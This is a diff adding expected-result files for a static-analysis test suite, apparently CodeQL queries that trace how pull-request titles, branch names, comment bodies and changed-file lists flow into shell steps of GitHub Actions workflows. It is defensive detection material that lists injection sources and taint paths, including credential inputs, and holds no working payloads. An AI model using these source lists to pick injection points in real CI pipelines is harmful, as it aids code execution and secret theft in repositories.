| +usesIds +| .github/workflows/test.yml:15:9:19:6 | name: G ... d files | source | +| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | step | +nodeLocations +| .github/workflows/test.yml:1:1:40:53 | on: push | .github/workflows/test.yml:1:1:40:53 | .github/workflows/test.yml@1:1:40:53 | +| .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | .github/workflows/test.yml:5:5:31:2 | .github/workflows/test.yml@5:5:31:2 | +| .github/workflows/test.yml:8:7:10:4 | job_out ... alue }} | .github/workflows/test.yml:8:7:10:4 | .github/workflows/test.yml@8:7:10:4 | +| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | .github/workflows/test.yml:8:19:8:49 | .github/workflows/test.yml@8:19:8:49 | +| .github/workflows/test.yml:11:9:15:6 | uses: a ... 
kout@v4 | .github/workflows/test.yml:11:9:15:6 | .github/workflows/test.yml@11:9:15:6 | +| .github/workflows/test.yml:15:9:19:6 | name: G ... d files | .github/workflows/test.yml:15:9:19:6 | .github/workflows/test.yml@15:9:19:6 | +| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | .github/workflows/test.yml:19:9:26:6 | .github/workflows/test.yml@19:9:26:6 | +| .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | .github/workflows/test.yml:23:19:23:63 | .github/workflows/test.yml@23:19:23:63 | +| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | .github/workflows/test.yml:26:9:28:6 | .github/workflows/test.yml@26:9:28:6 | +| .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | .github/workflows/test.yml:27:14:27:63 | .github/workflows/test.yml@27:14:27:63 | +| .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | .github/workflows/test.yml:28:9:31:2 | .github/workflows/test.yml@28:9:31:2 | +| .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | .github/workflows/test.yml:29:14:29:54 | .github/workflows/test.yml@29:14:29:54 | +| .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | .github/workflows/test.yml:32:5:40:53 | .github/workflows/test.yml@32:5:40:53 | +| .github/workflows/test.yml:39:9:40:53 | id: sink | .github/workflows/test.yml:39:9:40:53 | .github/workflows/test.yml@39:9:40:53 | +| .github/workflows/test.yml:40:14:40:52 | echo ${ ... 
utput}} | .github/workflows/test.yml:40:14:40:52 | .github/workflows/test.yml@40:14:40:52 | +scopes +| .github/workflows/test.yml:1:1:40:53 | on: push | +sources +| ahmadnassri/action-changed-files | * | output.files | pull_request_target | PR changed files | +| ahmadnassri/action-changed-files | * | output.json | pull_request_target | PR changed files | +| dorny/paths-filter | * | output.changes | pull_request_target | PR changed files | +| franzdiebold/github-env-vars-action | * | output.CI_PR_DESCRIPTION | pull_request_target | PR body | +| franzdiebold/github-env-vars-action | * | output.CI_PR_TITLE | pull_request_target | PR title | +| jitterbit/get-changed-files | * | output.added | pull_request_target | PR changed files | +| jitterbit/get-changed-files | * | output.added_modified | pull_request_target | PR changed files | +| jitterbit/get-changed-files | * | output.all | pull_request_target | PR changed files | +| jitterbit/get-changed-files | * | output.deleted | pull_request_target | PR changed files | +| jitterbit/get-changed-files | * | output.modified | pull_request_target | PR changed files | +| jitterbit/get-changed-files | * | output.removed | pull_request_target | PR changed files | +| jitterbit/get-changed-files | * | output.renamed | pull_request_target | PR changed files | +| khan/pull-request-comment-trigger | * | output.comment_body | issue_comment | | +| khan/pull-request-comment-trigger | * | output.comment_body | pull_request_comment | | +| octo-org/source-repo/.github/workflows/workflow.yml | * | output.workflow-output | * | Foo | +| tj-actions/branch-names | * | output.current_branch | pull_request_target | PR current branch | +| tj-actions/branch-names | * | output.head_ref_branch | pull_request_target | PR head branch | +| tj-actions/branch-names | * | output.ref_branch | pull_request_target | Branch tirggering workflow run | +| tj-actions/changed-files | * | output.added_files | pull_request_target | PR changed files | +| 
tj-actions/changed-files | * | output.all_changed_and_modified_files | pull_request_target | PR changed files | +| tj-actions/changed-files | * | output.all_changed_files | pull_request_target | PR changed files | +| tj-actions/changed-files | * | output.all_modified_files | pull_request_target | PR changed files | +| tj-actions/changed-files | * | output.all_old_new_renamed_files | pull_request_target | PR changed files | +| tj-actions/changed-files | * | output.changed_keys | pull_request_target | PR changed files | +| tj-actions/changed-files | * | output.copied_files | pull_request_target | PR changed files | +| tj-actions/changed-files | * | output.deleted_files | pull_request_target | PR changed files | +| tj-actions/changed-files | * | output.modified_files | pull_request_target | PR changed files | +| tj-actions/changed-files | * | output.modified_keys | pull_request_target | PR changed files | +| tj-actions/changed-files | * | output.other_changed_files | pull_request_target | PR changed files | +| tj-actions/changed-files | * | output.other_deleted_files | pull_request_target | PR changed files | +| tj-actions/changed-files | * | output.other_modified_files | pull_request_target | PR changed files | +| tj-actions/changed-files | * | output.renamed_files | pull_request_target | PR changed files | +| tj-actions/changed-files | * | output.type_changed_files | pull_request_target | PR changed files | +| tj-actions/changed-files | * | output.unknown_files | pull_request_target | PR changed files | +| tj-actions/changed-files | * | output.unmerged_files | pull_request_target | PR changed files | +| tj-actions/verify-changed-files | * | output.changed-files | pull_request_target | PR changed files | +| tzkhan/pr-update-action | * | output.headMatch | pull_request_target | | +| xt0rted/slash-command-action | * | output.command-arguments | issue_comment | | +| xt0rted/slash-command-action | * | output.command-arguments | pull_request_comment | | +summaries +| 
akhileshns/heroku-deploy | * | input.branch | output.status | taint | +| android-actions/setup-android | * | input.cmdline-tools-version | output.ANDROID_COMMANDLINE_TOOLS_VERSION | taint | +| apple-actions/import-codesign-certs | * | input.keychain-password | output.keychain-password | taint | +| ashley-taylor/read-json-property-action | * | input.json | output.value | taint | +| ashley-taylor/regex-property-action | * | input.replacement | output.value | taint | +| ashley-taylor/regex-property-action | * | input.value | output.value | taint | +| aszc/change-string-case-action | * | input.replace-with | output.lowercase | taint | +| aszc/change-string-case-action | * | input.replace-with | output.uppercase | taint | +| aszc/change-string-case-action | * | input.string | output.capitalized | taint | +| aws-actions/configure-aws-credentials | * | input.aws-access-key-id | env.AWS_ACCESS_KEY_ID | taint | +| aws-actions/configure-aws-credentials | * | input.aws-access-key-id | secret.AWS_ACCESS_KEY_ID | taint | +| aws-actions/configure-aws-credentials | * | input.aws-secret-access-key | env.AWS_SECRET_ACCESS_KEY | taint | +| aws-actions/configure-aws-credentials | * | input.aws-secret-access-key | secret.AWS_SECRET_ACCESS_KEY | taint | +| aws-actions/configure-aws-credentials | * | input.aws-session-token | env.AWS_SESSION_TOKEN | taint | +| aws-actions/configure-aws-credentials | * | input.aws-session-token | secret.AWS_SESSION_TOKEN | taint | +| bobheadxi/deployments | * | input.env | output.env | taint | +| bufbuild/buf-breaking-action | * | input.buf_token | env.BUF_TOKEN | taint | +| bufbuild/buf-lint-action | * | input.buf_token | env.BUF_TOKEN | taint | +| cachix/cachix-action | * | input.signingKey | env.CACHIX_SIGNING_KEY | taint | +| coursier/cache-action | * | input.path | env.COURSIER_CACHE | taint | +| crazy-max/ghaction-import-gpg | * | input.fingerprint | output.fingerprint | taint | +| csexton/release-asset-action | * | input.release-url | output.url | 
taint | +| delaguardo/setup-clojure | * | input.boot | env.BOOT_VERSION | taint | +| frabert/replace-string-action | * | input.replace-with | output.replaced | taint | +| frabert/replace-string-action | * | input.string | output.replaced | taint | +| game-ci/unity-test-runner | * | input.artifactsPath | output.artifactsPath | taint | +| getsentry/action-release | * | input.version | output.version | taint | +| getsentry/action-release | * | input.version_prefix | output.version | taint | +| github/codeql-action | * | input.output | output.sarif-output | taint | +| gradle/gradle-build-action | * | input.build-scan-terms-of-service-agree | env.BUILD_SCAN_TERMS_OF_SERVICE_AGREE | taint | +| gradle/gradle-build-action | * | input.build-scan-terms-of-service-url | env.BUILD_SCAN_TERMS_OF_SERVICE_URL | taint | +| gradle/gradle-build-action | * | input.cache-encryption-key | env.GRADLE_ENCRYPTION_KEY | taint | +| haya14busa/action-cond | * | input.if_false | output.value | taint | +| haya14busa/action-cond | * | input.if_true | output.value | taint | +| hexlet/project-action | * | input.mount-path | env.PWD | taint | +| jsdaniell/create-json | * | input.dir | output.successfully | taint | +| jsdaniell/create-json | * | input.json | output.successfully | taint | +| jsdaniell/create-json | * | input.name | output.successfully | taint | +| jwalton/gh-ecr-push | * | input.image | output.imageUrl | taint | +| larsoner/circleci-artifacts-redirector-action | * | input.artifact-path | output.url | taint | +| mad9000/actions-find-and-replace-string | * | input.replace | output.value | taint | +| mad9000/actions-find-and-replace-string | * | input.source | output.value | taint | +| mattdavis0351/actions | * | input.image-name | output.imageUrl | taint | +| mattdavis0351/actions | * | input.tag | output.imageUrl | taint | +| metro-digital/setup-tools-for-waas | * | input.gcp_sa_key | env.GCLOUD_PROJECT | taint | +| mishakav/pytest-coverage-comment | * | input.multiple-files | 
output.summaryReport | taint | +| mymindstorm/setup-emsdk | * | input.actions-cache-folder | env.EMSDK | taint | +| octo-org/summary-repo/.github/workflows/workflow.yml | * | input.config-path | output.workflow-output | taint | +| octo-org/this-repo/.github/workflows/workflow.yml | * | input.config-path | output.workflow-output | taint | +| ruby/setup-ruby | * | input.ruby-version | output.ruby-prefix | taint | +| salsify/action-detect-and-tag-new-version | * | input.tag-template | output.tag | taint | +| shallwefootball/upload-s3-action | * | input.destination_dir | output.object_key | taint | +| shogo82148/actions-setup-perl | * | input.working-directory | env.PERL5LIB | taint | +| suisei-cn/actions-download-file | * | input.filename | output.filename | taint | +| timheuer/base64-to-file | * | input.fileDir | output.filePath | taint | +| timheuer/base64-to-file | * | input.fileName | output.filePath | taint | +calls +| .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | actions/checkout | +| .github/workflows/test.yml:15:9:19:6 | name: G ... d files | tj-actions/changed-files | +| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | mad9000/actions-find-and-replace-string | +needs +| .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | diff --git a/ql/src/test/partial.expected b/ql/src/test/partial.expected new file mode 100644 index 00000000000..98aea83de2e --- /dev/null +++ b/ql/src/test/partial.expected 
@@ -0,0 +1,28 @@ +edges +| .github/workflows/calling_workflow.yml:12:5:15:2 | uses: . ... low.yml [workflow-output1] | .github/workflows/calling_workflow.yml:35:14:35:61 | echo ${ ... put1 }} | +| .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/calling_workflow.yml:12:5:15:2 | uses: . ... low.yml [workflow-output1] | +| .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | +| .github/workflows/calling_workflow.yml:16:5:19:2 | uses: o ... .yml@v1 [workflow-output] | .github/workflows/calling_workflow.yml:41:14:41:60 | echo ${ ... tput }} | +| .github/workflows/calling_workflow.yml:18:20:18:60 | ${{ git ... .ref }} | .github/workflows/calling_workflow.yml:16:5:19:2 | uses: o ... .yml@v1 [workflow-output] | +| .github/workflows/calling_workflow.yml:20:5:21:2 | uses: o ... .yml@v1 | .github/workflows/calling_workflow.yml:46:14:46:60 | echo ${ ... tput }} | +| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:27:24:27:48 | ${{ inp ... path }} | +| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:28:14:30:62 | \| | +| .github/workflows/reusable_workflow.yml:11:16:11:51 | ${{ job ... put1 }} | .github/workflows/reusable_workflow.yml:10:7:14:4 | output workflow-output1: [workflow-output1] | +| .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output1] | .github/workflows/reusable_workflow.yml:11:16:11:51 | ${{ job ... put1 }} | +| .github/workflows/reusable_workflow.yml:22:20:22:56 | ${{ ste ... utput}} | .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output1] | +| .github/workflows/reusable_workflow.yml:25:9:31:6 | id: step1 [step-output] | .github/workflows/reusable_workflow.yml:22:20:22:56 | ${{ ste ... 
utput}} | +| .github/workflows/reusable_workflow.yml:27:24:27:48 | ${{ inp ... path }} | .github/workflows/reusable_workflow.yml:25:9:31:6 | id: step1 [step-output] | +#select +| .github/workflows/calling_workflow.yml:12:5:15:2 | uses: . ... low.yml | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/calling_workflow.yml:12:5:15:2 | uses: . ... low.yml [workflow-output1] | This node receives taint from $@. | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | this source | +| .github/workflows/calling_workflow.yml:16:5:19:2 | uses: o ... .yml@v1 | .github/workflows/calling_workflow.yml:18:20:18:60 | ${{ git ... .ref }} | .github/workflows/calling_workflow.yml:16:5:19:2 | uses: o ... .yml@v1 [workflow-output] | This node receives taint from $@. | .github/workflows/calling_workflow.yml:18:20:18:60 | ${{ git ... .ref }} | this source | +| .github/workflows/calling_workflow.yml:35:14:35:61 | echo ${ ... put1 }} | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/calling_workflow.yml:35:14:35:61 | echo ${ ... put1 }} | This node receives taint from $@. | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | this source | +| .github/workflows/calling_workflow.yml:41:14:41:60 | echo ${ ... tput }} | .github/workflows/calling_workflow.yml:18:20:18:60 | ${{ git ... .ref }} | .github/workflows/calling_workflow.yml:41:14:41:60 | echo ${ ... tput }} | This node receives taint from $@. | .github/workflows/calling_workflow.yml:18:20:18:60 | ${{ git ... .ref }} | this source | +| .github/workflows/calling_workflow.yml:46:14:46:60 | echo ${ ... tput }} | .github/workflows/calling_workflow.yml:20:5:21:2 | uses: o ... .yml@v1 | .github/workflows/calling_workflow.yml:46:14:46:60 | echo ${ ... tput }} | This node receives taint from $@. | .github/workflows/calling_workflow.yml:20:5:21:2 | uses: o ... 
.yml@v1 | this source | +| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | This node receives taint from $@. | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | this source | +| .github/workflows/reusable_workflow.yml:10:7:14:4 | output workflow-output1: | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/reusable_workflow.yml:10:7:14:4 | output workflow-output1: [workflow-output1] | This node receives taint from $@. | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | this source | +| .github/workflows/reusable_workflow.yml:11:16:11:51 | ${{ job ... put1 }} | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/reusable_workflow.yml:11:16:11:51 | ${{ job ... put1 }} | This node receives taint from $@. | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | this source | +| .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output1] | This node receives taint from $@. | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | this source | +| .github/workflows/reusable_workflow.yml:22:20:22:56 | ${{ ste ... utput}} | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/reusable_workflow.yml:22:20:22:56 | ${{ ste ... utput}} | This node receives taint from $@. | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | this source | +| .github/workflows/reusable_workflow.yml:25:9:31:6 | id: step1 | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... 
.ref }} | .github/workflows/reusable_workflow.yml:25:9:31:6 | id: step1 [step-output] | This node receives taint from $@. | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | this source | +| .github/workflows/reusable_workflow.yml:27:24:27:48 | ${{ inp ... path }} | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/reusable_workflow.yml:27:24:27:48 | ${{ inp ... path }} | This node receives taint from $@. | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | this source | +| .github/workflows/reusable_workflow.yml:28:14:30:62 | \| | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/reusable_workflow.yml:28:14:30:62 | \| | This node receives taint from $@. | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | this source | diff --git a/ql/src/test/test.expected b/ql/src/test/test.expected new file mode 100644 index 00000000000..5dd2313e851 --- /dev/null +++ b/ql/src/test/test.expected 
@@ -0,0 +1,152 @@ +edges +| .github/workflows/argus_case_study.yml:15:9:24:6 | name: R ... g chars [replaced] | .github/workflows/argus_case_study.yml:26:14:27:95 | \| | +| .github/workflows/argus_case_study.yml:17:24:17:52 | ${{gith ... title}} | .github/workflows/argus_case_study.yml:22:19:22:38 | ${{env.ISSUE_TITLE}} | +| .github/workflows/argus_case_study.yml:22:19:22:38 | ${{env.ISSUE_TITLE}} | .github/workflows/argus_case_study.yml:15:9:24:6 | name: R ... g chars [replaced] | +| .github/workflows/calling_workflow.yml:12:5:15:2 | uses: . ... low.yml [workflow-output1] | .github/workflows/calling_workflow.yml:35:14:35:61 | echo ${ ... put1 }} | +| .github/workflows/calling_workflow.yml:12:5:15:2 | uses: . ... low.yml [workflow-output2] | .github/workflows/calling_workflow.yml:36:14:36:61 | echo ${ ... put2 }} | +| .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/calling_workflow.yml:12:5:15:2 | uses: . ... low.yml [workflow-output1] | +| .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | +| .github/workflows/calling_workflow.yml:16:5:19:2 | uses: o ... .yml@v1 [workflow-output] | .github/workflows/calling_workflow.yml:41:14:41:60 | echo ${ ... tput }} | +| .github/workflows/calling_workflow.yml:18:20:18:60 | ${{ git ... .ref }} | .github/workflows/calling_workflow.yml:16:5:19:2 | uses: o ... .yml@v1 [workflow-output] | +| .github/workflows/calling_workflow.yml:20:5:21:2 | uses: o ... .yml@v1 | .github/workflows/calling_workflow.yml:46:14:46:60 | echo ${ ... tput }} | +| .github/workflows/changed-files.yml:16:9:20:6 | name: G ... d files | .github/workflows/changed-files.yml:21:14:24:15 | \| | +| .github/workflows/cross3.yml:27:7:37:4 | name: R ... g chars [replaced] | .github/workflows/cross3.yml:39:30:39:74 | ${{step ... laced}} | +| .github/workflows/cross3.yml:27:7:37:4 | name: R ... 
g chars [replaced] | .github/workflows/cross3.yml:57:28:57:72 | ${{step ... laced}} | +| .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:27:7:37:4 | name: R ... g chars [replaced] | +| .github/workflows/cross3.yml:39:30:39:74 | ${{step ... laced}} | .github/workflows/cross3.yml:41:12:43:5 | \| | +| .github/workflows/cross3.yml:57:28:57:72 | ${{step ... laced}} | .github/workflows/cross3.yml:61:21:68:47 | \| | +| .github/workflows/cross3.yml:61:21:68:47 | \| | .github/workflows/cross3.yml:47:12:53:109 | \| | +| .github/workflows/image_link_generator.yml:15:9:22:6 | name: E ... ial URL [initial_url] | .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | +| .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | .github/workflows/image_link_generator.yml:15:9:22:6 | name: E ... ial URL [initial_url] | +| .github/workflows/image_link_generator.yml:22:9:28:6 | name: G ... bugging [redirected_url] | .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | +| .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | .github/workflows/image_link_generator.yml:22:9:28:6 | name: G ... bugging [redirected_url] | +| .github/workflows/image_link_generator.yml:28:9:35:6 | name: T ... ter PNG [trimmed_url] | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | +| .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | .github/workflows/image_link_generator.yml:28:9:35:6 | name: T ... ter PNG [trimmed_url] | +| .github/workflows/inter-job.yml:8:7:10:4 | job_out ... alue }} [job_output] | .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | +| .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | .github/workflows/inter-job.yml:8:7:10:4 | job_out ... alue }} [job_output] | +| .github/workflows/inter-job.yml:15:9:19:6 | name: G ... 
d files | .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | +| .github/workflows/inter-job.yml:19:9:27:2 | name: R ... d files [value] | .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | +| .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | .github/workflows/inter-job.yml:19:9:27:2 | name: R ... d files [value] | +| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:27:24:27:48 | ${{ inp ... path }} | +| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:28:14:30:62 | \| | +| .github/workflows/reusable_workflow.yml:10:7:14:4 | output workflow-output1: [workflow-output2] | .github/workflows/calling_workflow.yml:12:5:15:2 | uses: . ... low.yml [workflow-output2] | +| .github/workflows/reusable_workflow.yml:11:16:11:51 | ${{ job ... put1 }} | .github/workflows/reusable_workflow.yml:10:7:14:4 | output workflow-output1: [workflow-output1] | +| .github/workflows/reusable_workflow.yml:13:16:13:51 | ${{ job ... put2 }} | .github/workflows/reusable_workflow.yml:10:7:14:4 | output workflow-output1: [workflow-output2] | +| .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output1] | .github/workflows/reusable_workflow.yml:11:16:11:51 | ${{ job ... put1 }} | +| .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output2] | .github/workflows/reusable_workflow.yml:13:16:13:51 | ${{ job ... put2 }} | +| .github/workflows/reusable_workflow.yml:22:20:22:56 | ${{ ste ... utput}} | .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output1] | +| .github/workflows/reusable_workflow.yml:23:20:23:62 | ${{ ste ... files}} | .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... 
utput}} [job-output2] | +| .github/workflows/reusable_workflow.yml:25:9:31:6 | id: step1 [step-output] | .github/workflows/reusable_workflow.yml:22:20:22:56 | ${{ ste ... utput}} | +| .github/workflows/reusable_workflow.yml:27:24:27:48 | ${{ inp ... path }} | .github/workflows/reusable_workflow.yml:25:9:31:6 | id: step1 [step-output] | +| .github/workflows/reusable_workflow.yml:31:9:33:43 | name: G ... d files | .github/workflows/reusable_workflow.yml:23:20:23:62 | ${{ ste ... files}} | +| .github/workflows/simple1.yml:8:9:14:6 | id: summary [value] | .github/workflows/simple1.yml:15:14:16:50 | \| | +| .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | .github/workflows/simple1.yml:8:9:14:6 | id: summary [value] | +| .github/workflows/simple2.yml:14:9:18:6 | name: G ... d files | .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | +| .github/workflows/simple2.yml:18:9:26:6 | name: R ... d files [value] | .github/workflows/simple2.yml:28:14:31:15 | \| | +| .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | .github/workflows/simple2.yml:18:9:26:6 | name: R ... d files [value] | +| .github/workflows/test.yml:8:7:10:4 | job_out ... test }} [job_output] | .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | +| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | .github/workflows/test.yml:8:7:10:4 | job_out ... test }} [job_output] | +| .github/workflows/test.yml:12:9:18:6 | id: step0 [value] | .github/workflows/test.yml:20:17:20:47 | ${{ ste ... value}} | +| .github/workflows/test.yml:15:19:15:57 | ${{ git ... sage }} | .github/workflows/test.yml:12:9:18:6 | id: step0 [value] | +| .github/workflows/test.yml:18:9:24:6 | id: step1 [MSG] | .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | +| .github/workflows/test.yml:20:17:20:47 | ${{ ste ... 
value}} | .github/workflows/test.yml:18:9:24:6 | id: step1 [MSG] | +| .github/workflows/test.yml:24:9:29:2 | id: step2 [test] | .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | +| .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | .github/workflows/test.yml:24:9:29:2 | id: step2 [test] | +| composite-actions/action.yml:4:3:4:14 | input who-to-greet | composite-actions/action.yml:28:17:28:42 | ${{ inp ... reet }} | +| composite-actions/action.yml:4:3:4:14 | input who-to-greet | composite-actions/action.yml:35:12:35:51 | echo "H ... et }}." | +| composite-actions/action.yml:24:7:31:4 | name: Remove foo [value] | composite-actions/action.yml:32:12:32:50 | echo ${ ... alue }} | +| composite-actions/action.yml:28:17:28:42 | ${{ inp ... reet }} | composite-actions/action.yml:24:7:31:4 | name: Remove foo [value] | +nodes +| .github/workflows/argus_case_study.yml:15:9:24:6 | name: R ... g chars [replaced] | semmle.label | name: R ... g chars [replaced] | +| .github/workflows/argus_case_study.yml:17:24:17:52 | ${{gith ... title}} | semmle.label | ${{gith ... title}} | +| .github/workflows/argus_case_study.yml:22:19:22:38 | ${{env.ISSUE_TITLE}} | semmle.label | ${{env.ISSUE_TITLE}} | +| .github/workflows/argus_case_study.yml:26:14:27:95 | \| | semmle.label | \| | +| .github/workflows/calling_workflow.yml:12:5:15:2 | uses: . ... low.yml [workflow-output1] | semmle.label | uses: . ... low.yml [workflow-output1] | +| .github/workflows/calling_workflow.yml:12:5:15:2 | uses: . ... low.yml [workflow-output2] | semmle.label | uses: . ... low.yml [workflow-output2] | +| .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | semmle.label | ${{ git ... .ref }} | +| .github/workflows/calling_workflow.yml:16:5:19:2 | uses: o ... .yml@v1 [workflow-output] | semmle.label | uses: o ... .yml@v1 [workflow-output] | +| .github/workflows/calling_workflow.yml:18:20:18:60 | ${{ git ... .ref }} | semmle.label | ${{ git ... 
.ref }} | +| .github/workflows/calling_workflow.yml:20:5:21:2 | uses: o ... .yml@v1 | semmle.label | uses: o ... .yml@v1 | +| .github/workflows/calling_workflow.yml:35:14:35:61 | echo ${ ... put1 }} | semmle.label | echo ${ ... put1 }} | +| .github/workflows/calling_workflow.yml:36:14:36:61 | echo ${ ... put2 }} | semmle.label | echo ${ ... put2 }} | +| .github/workflows/calling_workflow.yml:41:14:41:60 | echo ${ ... tput }} | semmle.label | echo ${ ... tput }} | +| .github/workflows/calling_workflow.yml:46:14:46:60 | echo ${ ... tput }} | semmle.label | echo ${ ... tput }} | +| .github/workflows/changed-files.yml:16:9:20:6 | name: G ... d files | semmle.label | name: G ... d files | +| .github/workflows/changed-files.yml:21:14:24:15 | \| | semmle.label | \| | +| .github/workflows/cross3.yml:27:7:37:4 | name: R ... g chars [replaced] | semmle.label | name: R ... g chars [replaced] | +| .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | semmle.label | ${{gith ... ssage}} | +| .github/workflows/cross3.yml:39:30:39:74 | ${{step ... laced}} | semmle.label | ${{step ... laced}} | +| .github/workflows/cross3.yml:41:12:43:5 | \| | semmle.label | \| | +| .github/workflows/cross3.yml:47:12:53:109 | \| | semmle.label | \| | +| .github/workflows/cross3.yml:57:28:57:72 | ${{step ... laced}} | semmle.label | ${{step ... laced}} | +| .github/workflows/cross3.yml:61:21:68:47 | \| | semmle.label | \| | +| .github/workflows/image_link_generator.yml:15:9:22:6 | name: E ... ial URL [initial_url] | semmle.label | name: E ... ial URL [initial_url] | +| .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | semmle.label | ${{ git ... body }} | +| .github/workflows/image_link_generator.yml:22:9:28:6 | name: G ... bugging [redirected_url] | semmle.label | name: G ... bugging [redirected_url] | +| .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | semmle.label | ${{ ste ... 
_url }} | +| .github/workflows/image_link_generator.yml:28:9:35:6 | name: T ... ter PNG [trimmed_url] | semmle.label | name: T ... ter PNG [trimmed_url] | +| .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | semmle.label | ${{ ste ... _url }} | +| .github/workflows/image_link_generator.yml:36:14:37:126 | \| | semmle.label | \| | +| .github/workflows/inter-job.yml:8:7:10:4 | job_out ... alue }} [job_output] | semmle.label | job_out ... alue }} [job_output] | +| .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | semmle.label | ${{ ste ... alue }} | +| .github/workflows/inter-job.yml:15:9:19:6 | name: G ... d files | semmle.label | name: G ... d files | +| .github/workflows/inter-job.yml:19:9:27:2 | name: R ... d files [value] | semmle.label | name: R ... d files [value] | +| .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | +| .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | +| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | semmle.label | input config-path | +| .github/workflows/reusable_workflow.yml:10:7:14:4 | output workflow-output1: [workflow-output1] | semmle.label | output workflow-output1: [workflow-output1] | +| .github/workflows/reusable_workflow.yml:10:7:14:4 | output workflow-output1: [workflow-output2] | semmle.label | output workflow-output1: [workflow-output2] | +| .github/workflows/reusable_workflow.yml:11:16:11:51 | ${{ job ... put1 }} | semmle.label | ${{ job ... put1 }} | +| 